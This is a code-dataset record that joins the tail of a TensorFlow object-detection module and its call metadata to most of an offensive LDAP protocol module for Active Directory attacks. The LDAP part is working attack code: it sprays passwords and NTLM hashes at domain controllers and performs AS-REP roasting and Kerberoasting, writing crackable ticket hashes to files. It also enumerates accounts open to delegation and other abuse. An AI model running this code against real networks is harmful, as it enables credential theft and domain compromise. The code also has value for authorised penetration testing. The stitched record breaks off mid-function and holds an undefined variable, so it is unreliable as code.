score_list.append(self.scores[i].tolist())
inference = Inference(
method = self.method,
id = None,
status = None,
box_list = box_list,
score_list = score_list,
label_list = label_list
)
return inference
def visual(self,
image = None
):
if image is None:
image = self.image_backup
# WIP
#if self.sub_method == "default" or self.sub_method is None:
#print("ran visual")
vis_util.visualize_boxes_and_labels_on_image_array(
image,
self.boxes,
self.classes,
self.scores,
self.model_id_to_name,
use_normalized_coordinates=True,
line_thickness=3,
min_score_thresh=self.min_score_thresh)
return image
|
[
"diffgram.brain.inference.Inference",
"tensorflow.Session",
"numpy.expand_dims",
"tempfile.mkdtemp",
"diffgram.utils.visualization_utils.visualize_boxes_and_labels_on_image_array",
"tensorflow.gfile.GFile",
"tensorflow.Graph",
"requests.get",
"numpy.squeeze",
"tensorflow.import_graph_def",
"tensorflow.GraphDef",
"tensorflow.compat.as_bytes"
] |
[((1340, 1512), 'diffgram.brain.inference.Inference', 'Inference', ([], {'method': '"""object_detection"""', 'id': "dict['id']", 'status': "dict['status']", 'box_list': "dict['box_list']", 'score_list': "dict['score_list']", 'label_list': "dict['label_list']"}), "(method='object_detection', id=dict['id'], status=dict['status'],\n box_list=dict['box_list'], score_list=dict['score_list'], label_list=\n dict['label_list'])\n", (1349, 1512), False, 'from diffgram.brain.inference import Inference\n'), ((4540, 4557), 'numpy.squeeze', 'np.squeeze', (['boxes'], {}), '(boxes)\n', (4550, 4557), True, 'import numpy as np\n'), ((4574, 4592), 'numpy.squeeze', 'np.squeeze', (['scores'], {}), '(scores)\n', (4584, 4592), True, 'import numpy as np\n'), ((10700, 10710), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (10708, 10710), True, 'import tensorflow as tf\n'), ((11975, 12095), 'diffgram.brain.inference.Inference', 'Inference', ([], {'method': 'self.method', 'id': 'None', 'status': 'None', 'box_list': 'box_list', 'score_list': 'score_list', 'label_list': 'label_list'}), '(method=self.method, id=None, status=None, box_list=box_list,\n score_list=score_list, label_list=label_list)\n', (11984, 12095), False, 'from diffgram.brain.inference import Inference\n'), ((12340, 12560), 'diffgram.utils.visualization_utils.visualize_boxes_and_labels_on_image_array', 'vis_util.visualize_boxes_and_labels_on_image_array', (['image', 'self.boxes', 'self.classes', 'self.scores', 'self.model_id_to_name'], {'use_normalized_coordinates': '(True)', 'line_thickness': '(3)', 'min_score_thresh': 'self.min_score_thresh'}), '(image, self.boxes, self.\n classes, self.scores, self.model_id_to_name, use_normalized_coordinates\n =True, line_thickness=3, min_score_thresh=self.min_score_thresh)\n', (12390, 12560), True, 'import diffgram.utils.visualization_utils as vis_util\n'), ((1172, 1190), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (1188, 1190), False, 'import tempfile\n'), ((3934, 3971), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['self.image_to_run'], {}), '(self.image_to_run)\n', (3952, 3971), True, 'import tensorflow as tf\n'), ((4005, 4055), 'numpy.expand_dims', 'np.expand_dims', (['self.image_to_run_expanded'], {'axis': '(0)'}), '(self.image_to_run_expanded, axis=0)\n', (4019, 4055), True, 'import numpy as np\n'), ((9730, 9760), 'requests.get', 'requests.get', (['url'], {'stream': '(True)'}), '(url, stream=True)\n', (9742, 9760), False, 'import requests\n'), ((10813, 10826), 'tensorflow.GraphDef', 'tf.GraphDef', ([], {}), '()\n', (10824, 10826), True, 'import tensorflow as tf\n'), ((11025, 11053), 'tensorflow.Session', 'tf.Session', ([], {'graph': 'self.graph'}), '(graph=self.graph)\n', (11035, 11053), True, 'import tensorflow as tf\n'), ((4610, 4629), 'numpy.squeeze', 'np.squeeze', (['classes'], {}), '(classes)\n', (4620, 4629), True, 'import numpy as np\n'), ((10836, 10873), 'tensorflow.gfile.GFile', 'tf.gfile.GFile', (['self.model_path', '"""rb"""'], {}), "(self.model_path, 'rb')\n", (10850, 10873), True, 'import tensorflow as tf\n'), ((10969, 11008), 'tensorflow.import_graph_def', 'tf.import_graph_def', (['graph_def'], {'name': '""""""'}), "(graph_def, name='')\n", (10988, 11008), True, 'import tensorflow as tf\n')]
|
# from https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py
# https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
import requests
import logging
import configparser
from binascii import b2a_hex, unhexlify, hexlify
from cme.connection import *
from cme.helpers.logger import highlight
from cme.logger import CMEAdapter
from cme.helpers.bloodhound import add_user_bh
from cme.protocols.ldap.kerberos import KerberosAttacks
from impacket.smbconnection import SMBConnection, SessionError
from impacket.smb import SMB_DIALECT
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_DONT_REQUIRE_PREAUTH, UF_TRUSTED_FOR_DELEGATION, UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION
from impacket.krb5.kerberosv5 import sendReceive, KerberosError, getKerberosTGT, getKerberosTGS
from impacket.krb5.types import KerberosTime, Principal
from impacket.ldap import ldap as ldap_impacket
from impacket.krb5 import constants
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from io import StringIO
ldap_error_status = {
"533":"STATUS_ACCOUNT_DISABLED",
"701":"STATUS_ACCOUNT_EXPIRED",
"531":"STATUS_ACCOUNT_RESTRICTION",
"530":"STATUS_INVALID_LOGON_HOURS",
"532":"STATUS_PASSWORD_EXPIRED",
"773":"STATUS_PASSWORD_MUST_CHANGE",
"775":"USER_ACCOUNT_LOCKED",
"50":"LDAP_INSUFFICIENT_ACCESS"
}
class ldap(connection):
def __init__(self, args, db, host):
self.domain = None
self.server_os = None
self.os_arch = 0
self.hash = None
self.ldapConnection = None
self.lmhash = ''
self.nthash = ''
self.baseDN = ''
self.remote_ops = None
self.bootkey = None
self.output_filename = None
self.smbv1 = None
self.signing = False
self.smb_share_name = smb_share_name
self.admin_privs = False
connection.__init__(self, args, db, host)
@staticmethod
def proto_args(parser, std_parser, module_parser):
ldap_parser = parser.add_parser('ldap', help="own stuff using LDAP", parents=[std_parser, module_parser])
ldap_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
ldap_parser.add_argument("--no-bruteforce", action='store_true', help='No spray when using file for username and password (user1 => <PASSWORD>, user2 => <PASSWORD>')
ldap_parser.add_argument("--continue-on-success", action='store_true', help="continues authentication attempts even after successes")
ldap_parser.add_argument("--port", type=int, choices={389, 636}, default=389, help="LDAP port (default: 389)")
dgroup = ldap_parser.add_mutually_exclusive_group()
dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', type=str, default=None, help="domain to authenticate to")
dgroup.add_argument("--local-auth", action='store_true', help='authenticate locally to each target')
egroup = ldap_parser.add_argument_group("Retrevie hash on the remote DC", "Options to get hashes from Kerberos")
egroup.add_argument("--asreproast", help="Get AS_REP response ready to crack with hashcat")
egroup.add_argument("--kerberoasting", help='Get TGS ticket ready to crack with hashcat')
vgroup = ldap_parser.add_argument_group("Retrieve useful information on the domain", "Options to to play with Kerberos")
vgroup.add_argument("--trusted-for-delegation", action="store_true", help="Get the list of users and computers with flag TRUSTED_FOR_DELEGATION")
vgroup.add_argument("--password-not-required", action="store_true", help="Get the list of users with flag PASSWD_NOTREQD")
vgroup.add_argument("--admin-count", action="store_true", help="Get objets that had the value adminCount=1")
vgroup.add_argument("--users", action="store_true", help="Enumerate enabled domain users")
vgroup.add_argument("--groups", action="store_true", help="Enumerate domain groups")
return parser
def proto_logger(self):
self.logger = CMEAdapter(extra={
'protocol': "SMB",
'host': self.host,
'port': "445",
'hostname': self.hostname
})
def get_os_arch(self):
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
if self.args.kerberos:
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
dce.connect()
try:
dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
except (DCERPCException, e):
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except Exception as e:
logging.debug('Error retrieving os arch of {}: {}'.format(self.host, str(e)))
return 0
def enum_host_info(self):
self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0]
try:
self.conn.login('' , '')
except:
#if "STATUS_ACCESS_DENIED" in e:
pass
self.domain = self.conn.getServerDNSDomainName()
self.hostname = self.conn.getServerName()
self.server_os = self.conn.getServerOS()
self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection['RequireSigning']
self.os_arch = self.get_os_arch()
self.output_filename = os.path.expanduser('~/.cme/logs/{}_{}_{}'.format(self.hostname, self.host, datetime.now().strftime("%Y-%m-%d_%H%M%S")))
if not self.domain:
self.domain = self.hostname
try:
'''plaintext_login
DC's seem to want us to logoff first, windows workstations sometimes reset the connection
(go home Windows, you're drunk)
'''
self.conn.logoff()
except:
pass
if self.args.domain:
self.domain = self.args.domain
if self.args.local_auth:
self.domain = self.hostname
#Re-connect since we logged off
self.create_conn_obj()
def print_host_info(self):
self.logger.info(u"{}{} (name:{}) (domain:{}) (signing:{}) (SMBv1:{})".format(self.server_os,
' x{}'.format(self.os_arch) if self.os_arch else '',
self.hostname,
self.domain,
self.signing,
self.smbv1))
return True
def kerberos_login(self, domain, aesKey, kdcHost):
if self.kdcHost is not None:
target = self.kdcHost
else:
target = self.domain
self.kdcHost = self.domain
# Create the baseDN
self.baseDN = ''
domainParts = self.domain.split('.')
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.kerberosLogin(self.username, self.password, self.domain, self.lmhash, self.nthash,
self.aesKey, kdcHost=self.kdcHost)
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.kerberosLogin(self.username, self.password, self.domain, self.lmhash, self.nthash,
self.aesKey, kdcHost=self.kdcHost)
else:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
return True
def plaintext_login(self, domain, username, password):
self.username = username
self.password = password
self.domain = domain
if self.kdcHost is not None:
target = self.kdcHost
else:
target = domain
self.kdcHost = domain
# Create the baseDN
self.baseDN = ''
domainParts = self.kdcHost.split('.')
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
if self.password == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return False
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.check_if_admin()
# Connect to LDAP
out = u'{}{}:{} {}'.format('{}\\'.format(domain),
username,
password,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
self.logger.extra['protocol'] = "LDAP"
self.logger.extra['port'] = "389"
self.logger.success(out)
add_user_bh(self.username, self.domain, self.logger, self.config)
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.logger.extra['protocol'] = "LDAPS"
self.logger.extra['port'] = "636"
self.logger.success(out)
except ldap_impacket.LDAPSessionError as e:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
else:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
return False
except OSError as e:
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
"Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller"))
return False
def hash_login(self, domain, username, ntlm_hash):
lmhash = ''
nthash = ''
#This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(':') != -1:
lmhash, nthash = ntlm_hash.split(':')
else:
nthash = ntlm_hash
self.hash = ntlm_hash
if lmhash: self.lmhash = lmhash
if nthash: self.nthash = nthash
self.username = username
self.domain = domain
if self.kdcHost is not None:
target = self.kdcHost
else:
target = domain
self.kdcHost = domain
# Create the baseDN
self.baseDN = ''
domainParts = self.kdcHost.split('.')
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
if self.hash == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return False
# Connect to LDAP
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.check_if_admin()
out = u'{}{}:{} {}'.format('{}\\'.format(domain),
username,
nthash,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
self.logger.extra['protocol'] = "LDAP"
self.logger.extra['port'] = "389"
self.logger.success(out)
add_user_bh(self.username, self.domain, self.logger, self.config)
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
try:
# We need to try SSL
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.logger.extra['protocol'] = "LDAPS"
self.logger.extra['port'] = "636"
self.logger.success(out)
except ldap_impacket.LDAPSessionError as e:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
else:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
return False
except OSError as e:
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.nthash,
"Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller"))
return False
def create_smbv1_conn(self):
try:
self.conn = SMBConnection(self.host, self.host, None, 445, preferredDialect=SMB_DIALECT)
self.smbv1 = True
except socket.error as e:
if str(e).find('Connection reset by peer') != -1:
logging.debug('SMBv1 might be disabled on {}'.format(self.host))
return False
except Exception as e:
logging.debug('Error creating SMBv1 connection to {}: {}'.format(self.host, e))
return False
return True
def create_smbv3_conn(self):
try:
self.conn = SMBConnection(self.host, self.host, None, 445)
self.smbv1 = False
except socket.error:
return False
except Exception as e:
logging.debug('Error creating SMBv3 connection to {}: {}'.format(self.host, e))
return False
return True
def create_conn_obj(self):
if self.create_smbv1_conn():
return True
elif self.create_smbv3_conn():
return True
return False
def sid_to_str(self, sid):
try:
# revision
revision = int(sid[0])
# count of sub authorities
sub_authorities = int(sid[1])
# big endian
identifier_authority = int.from_bytes(sid[2:8], byteorder='big')
# If true then it is represented in hex
if identifier_authority >= 2 ** 32:
identifier_authority = hex(identifier_authority)
# loop over the count of small endians
sub_authority = '-' + '-'.join([str(int.from_bytes(sid[8 + (i * 4): 12 + (i * 4)], byteorder='little')) for i in range(sub_authorities)])
objectSid = 'S-' + str(revision) + '-' + str(identifier_authority) + sub_authority
return objectSid
except Exception:
pass
return sid
def check_if_admin(self):
# 1. get SID of the domaine
sid_domaine = ""
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=8192)"
attributes= ["objectSid"]
resp = self.search(searchFilter, attributes, sizeLimit=0)
answers = []
for attribute in resp[0][1]:
if str(attribute['type']) == 'objectSid':
sid = self.sid_to_str(attribute['vals'][0])
sid_domaine = '-'.join(sid.split('-')[:-1])
# 2. get all group cn name
searchFilter = "(|(objectSid="+sid_domaine+"-512)(objectSid="+sid_domaine+"-544)(objectSid="+sid_domaine+"-519)(objectSid=S-1-5-32-549)(objectSid=S-1-5-32-551))"
attributes= ["distinguishedName"]
resp = self.search(searchFilter, attributes, sizeLimit=0)
answers = []
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
for attribute in item['attributes']:
if str(attribute['type']) == 'distinguishedName':
answers.append(str("(memberOf:1.2.840.113556.1.4.1941:=" + attribute['vals'][0] + ")"))
# 3. get memeber of these groups
searchFilter = "(&(objectCategory=user)(sAMAccountName=" + self.username + ")(|" + ''.join(answers) + "))"
attributes= [""]
resp = self.search(searchFilter, attributes, sizeLimit=0)
answers = []
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
if item:
self.admin_privs = True
def getUnixTime(self, t):
t -= 116444736000000000
t /= 10000000
return t
def search(self, searchFilter, attributes, sizeLimit=0):
try:
logging.debug('Search Filter=%s' % searchFilter)
resp = self.ldapConnection.search(searchFilter=searchFilter,
attributes=attributes,
sizeLimit=sizeLimit)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
self.logger.error('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
self.logger.error(e)
return False
return resp
def users(self):
# Building the search filter
searchFilter = "(sAMAccountType=805306368)"
attributes= ['sAMAccountName', 'description', 'badPasswordTime', 'badPwdCount', 'pwdLastSet']
resp = self.search(searchFilter, attributes, sizeLimit=0)
if resp:
answers = []
self.logger.info('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
sAMAccountName = ''
badPasswordTime = ''
badPwdCount = 0
description = ''
pwdLastSet = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
elif str(attribute['type']) == 'description':
description = str(attribute['vals'][0])
self.logger.highlight('{:<30} {}'.format(sAMAccountName, description))
except Exception as e:
self.logger.debug('Skipping item, cannot process due to error %s' % str(e))
pass
return
def groups(self):
# Building the search filter
searchFilter = "(objectCategory=group)"
attributes=['name']
resp = self.search(searchFilter, attributes, 0)
if resp:
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
name = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'name':
name = str(attribute['vals'][0])
self.logger.highlight('{}'.format(name))
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
return
def asreproast(self):
if self.password == '' and self.nthash == '' and self.kerberos == False:
return False
# Building the search filter
searchFilter = "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)" \
"(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" % \
(UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)
attributes = ['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 0)
if resp:
answers = []
self.logger.info('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
for user in answers:
hash_TGT = KerberosAttacks(self).getTGT_asroast(user[0])
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return True
else:
self.logger.highlight("No entries found!")
return
self.logger.error("Error with the LDAP account used")
def kerberoasting(self):
# Building the search filter
searchFilter = "(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)" \
"(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))"
attributes = ['servicePrincipalName', 'sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 0)
if resp:
answers = []
self.logger.info('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
SPNs = []
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
delegation = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = str(attribute['vals'][0])
if int(userAccountControl) & UF_TRUSTED_FOR_DELEGATION:
delegation = 'unconstrained'
elif int(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION:
delegation = 'constrained'
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'servicePrincipalName':
for spn in attribute['vals']:
SPNs.append(str(spn))
if mustCommit is True:
if int(userAccountControl) & UF_ACCOUNTDISABLE:
logging.debug('Bypassing disabled account %s ' % sAMAccountName)
else:
for spn in SPNs:
answers.append([spn, sAMAccountName,memberOf, pwdLastSet, lastLogon, delegation])
except Exception as e:
logging.error('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
#users = dict( (vals[1], vals[0]) for vals in answers)
TGT = KerberosAttacks(self).getTGT_kerberoasting()
for SPN, sAMAccountName, memberOf, pwdLastSet, lastLogon, delegation in answers:
try:
serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.domain,
self.kdcHost,
TGT['KDC_REP'], TGT['cipher'],
TGT['sessionKey'])
r = KerberosAttacks(self).outputTGS(tgs, oldSessionKey, sessionKey, sAMAccountName, SPN)
self.logger.highlight(u'sAMAccountName: {} memberOf: {} pwdLastSet: {} lastLogon:{}'.format(sAMAccountName, memberOf, pwdLastSet, lastLogon))
self.logger.highlight(u'{}'.format(r))
with open(self.args.kerberoasting, 'a+') as hash_kerberoasting:
hash_kerberoasting.write(r + '\n')
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error('SPN: %s - %s' % (SPN,str(e)))
else:
self.logger.highlight("No entries found!")
return
self.logger.error("Error with the LDAP account used")
def trusted_for_delegation(self):
# Building the search filter
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
attributes = ['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 0)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight(value[0])
else:
self.logger.error("No entries found!")
return
def password_not_required(self):
# Building the search filter
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=32)"
try:
logging.debug('Search Filter=%s' % searchFilter)
resp = self.ldapConnection.search(searchFilter=searchFilter,
attributes=['sAMAccountName',
'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
sizeLimit=0)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
return False
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
status = 'enabled'
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
if int(attribute['vals'][0]) & 2 :
status = 'disabled'
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName, memberOf, pwdLastSet, lastLogon, userAccountControl, status])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight("User: " + value[0] + " Status: " + value[5])
else:
self.logger.error("No entries found!")
return
def admin_count(self):
# Building the search filter
searchFilter = "(adminCount=1)"
attributes=['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 0)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
